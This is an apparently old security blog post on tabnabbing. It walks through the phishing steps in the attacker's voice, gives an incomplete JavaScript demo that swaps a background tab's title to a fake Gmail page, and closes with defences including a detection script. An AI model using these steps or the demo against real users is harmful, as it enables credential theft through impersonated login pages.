Monday, April 18, 2011


  • What is Tabnabbing?

Tabnabbing is a phishing attack that persuades users to submit their login details and passwords to popular web sites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert.

  • How Tabnabbing Works?

1. A user navigates to your normal-looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-alike. This can all be done with just a little bit of JavaScript and takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue: memory is malleable and moldable, and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

  • Source Code:

    var TIMER = null;
    var HAS_SWITCHED = false;

    // Start a 5-second countdown when the tab loses focus; cancel it if focus returns.
    window.onblur = function(){
        TIMER = setTimeout(changeItUp, 5000);
    };

    window.onfocus = function(){
        if(TIMER) clearTimeout(TIMER);
    };

    function setTitle(text){ document.title = text; }

    favicon = {
        docHead: document.getElementsByTagName("head")[0],

        set: function(url){
            // body not present on the original page
        },

        addLink: function(iconURL) {
            var link = document.createElement("link");
            link.type = "image/x-icon";
            link.rel = "shortcut icon";
            link.href = iconURL;
            // remainder not present on the original page
        },

        removeLinkIfExists: function() {
            var links = this.docHead.getElementsByTagName("link");
            for (var i=0; i<links.length; i++) {
                var link = links[i];
                if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
                    // removal step not present on the original page
                }
            }
        },

        get: function() {
            var links = this.docHead.getElementsByTagName("link");
            for (var i=0; i<links.length; i++) {
                var link = links[i];
                if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
                    return link.href;
                }
            }
        }
    };

    function createShield(){
        // Full-page overlay that covers the real page content. The style property
        // names were lost on the original page and are inferred from the values.
        div = document.createElement("div");
        div.style.position = "fixed";
        div.style.top = 0;
        div.style.left = 0;
        div.style.backgroundColor = "white";
        div.style.width = "100%";
        div.style.height = "100%";
        div.style.textAlign = "center";
        div.style.overflow = "hidden";

        img = document.createElement("img");
        img.style.paddingTop = "15px";   // property name inferred
        img.src = "";                     // image URL not present on the original page

        var oldTitle = document.title;
        var oldFavicon = favicon.get() || "/favicon.ico";

        // Clicking the image removes the overlay again.
        img.onclick = function(){
            div.parentNode.removeChild(div);
            document.body.style.overflow = "auto";   // target of this assignment inferred
        };
        // The step that attaches the overlay to the page is not present on the original page.
    }

    function changeItUp(){
        if( HAS_SWITCHED == false ){
            setTitle( "Gmail: Email from Google");
            // remainder not present on the original page
        }
    }


  • Protection:

1. Keep your web browser up-to-date. Also make sure that plugins and extensions are up-to-date and from trusted sources.

2. The NoScript extension for Firefox defends against both the JavaScript-based attack and the scriptless variant based on meta refresh, by preventing inactive tabs from changing the location of the page.

3. Pay attention to the address in your browser’s toolbar, especially when it comes to login pages. It’s easy to get into muscle-memory mode and just assume that a tab is unchanged, but for important user accounts, keep an eye on that location bar.

4. Consider using some sort of password management tool. Raskin points to the Firefox Account Manager as one way of using the browser as your identity manager, but plugins and tools like 1Password are good choices too. Rather than typing in user names and passwords individually, using an identity manager that compares the site you are on against the stored data in its database (making sure the addresses and DNS addresses match up) will prevent you from entering information into a false site.
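The attack steps above and protection item 2 both hinge on one observable: a background tab rewriting its own title and favicon. The following is an added example, not code from the original post or from Raskin's demo, showing how a page-side watcher (the kind of logic a browser extension's content script could run) flags exactly that. The decision rule, the MIN_HIDDEN_MS threshold and all function names are this example's own assumptions; the state machine is kept free of DOM calls so it can be exercised outside a browser.

```javascript
'use strict';
// Added example (not part of the original post): flag title/favicon changes
// made while the tab has been in the background for a while, which is the
// swap described in steps 2 and 3 above. Threshold and names are assumptions.

const MIN_HIDDEN_MS = 2000; // assumed threshold; the demo above waits 5000 ms

// Pure state machine so the logic can run without a DOM. `clock` returns ms.
function createTabnabMonitor(clock) {
  let hiddenSince = null;   // time the tab went to the background, or null
  let lastTitle = null;
  let lastIcon = null;
  const alerts = [];

  return {
    // Record the page's own title and icon as the trusted baseline.
    init(title, icon) {
      lastTitle = title;
      lastIcon = icon;
    },
    // Mirror document.visibilitychange.
    onVisibility(hidden) {
      hiddenSince = hidden ? clock() : null;
    },
    // Called on every <head> mutation; returns what changed and records an
    // alert when the change happened in a tab that has been hidden a while.
    onHeadChange(title, icon) {
      const changed = [];
      if (title !== lastTitle) changed.push('title');
      if (icon !== lastIcon) changed.push('favicon');
      lastTitle = title;
      lastIcon = icon;
      if (changed.length > 0 && hiddenSince !== null) {
        const hiddenForMs = clock() - hiddenSince;
        if (hiddenForMs >= MIN_HIDDEN_MS) {
          alerts.push({ changed, hiddenForMs, title, icon });
        }
      }
      return changed;
    },
    alerts() {
      return alerts.slice();
    },
  };
}

// Read the favicon the same way the demo above does: the first icon <link>.
// `rel~="icon"` also matches rel="shortcut icon".
function currentFavicon(doc) {
  const link = doc.querySelector('link[rel~="icon"]');
  return link ? link.href : null;
}

// Browser wiring (skipped when run under Node): observe <head> for title text
// and <link> attribute changes, and warn on the console for each new alert.
if (typeof document !== 'undefined' && typeof MutationObserver !== 'undefined') {
  const monitor = createTabnabMonitor(Date.now);
  let reported = 0;
  monitor.init(document.title, currentFavicon(document));
  document.addEventListener('visibilitychange', () => monitor.onVisibility(document.hidden));
  new MutationObserver(() => {
    monitor.onHeadChange(document.title, currentFavicon(document));
    const all = monitor.alerts();
    while (reported < all.length) {
      const a = all[reported++];
      console.warn('possible tabnabbing: ' + a.changed.join('+') + ' changed after ' +
        a.hiddenForMs + ' ms in background; new title "' + a.title + '"');
    }
  }).observe(document.head, { childList: true, subtree: true, attributes: true, characterData: true });
}
```

Two caveats on the heuristic: legitimate pages also rewrite their title in the background (a mail client updating an unread count, for instance), so this is a warning signal rather than something to block on, and a page that swaps only its body while leaving title and favicon alone is not caught, which is why the address-bar and password-manager advice above still matters.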

Happy Hacking...Enjoy...

For educational purposes only...Do not misuse it...


If you like this post, comment please...